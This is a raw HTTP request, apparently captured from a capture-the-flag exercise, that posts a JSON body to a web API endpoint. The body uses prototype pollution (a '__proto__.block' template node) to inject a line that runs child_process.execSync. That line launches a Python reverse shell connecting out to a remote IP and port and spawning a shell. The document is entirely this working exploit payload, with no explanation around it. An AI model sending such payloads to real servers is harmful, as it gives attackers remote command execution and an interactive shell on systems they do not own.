POST /api/submit HTTP/1.1
Host: 46.101.59.36:31543
Content-Length: 364
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://46.101.59.36:31543
Referer: http://46.101.59.36:31543/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


{"artist.name":"Westaway","__proto__.block": {"type": "Text", "line": "process.mainModule.require('child_process').execSync(`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"3.138.180.119\",16699));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'`)"}}



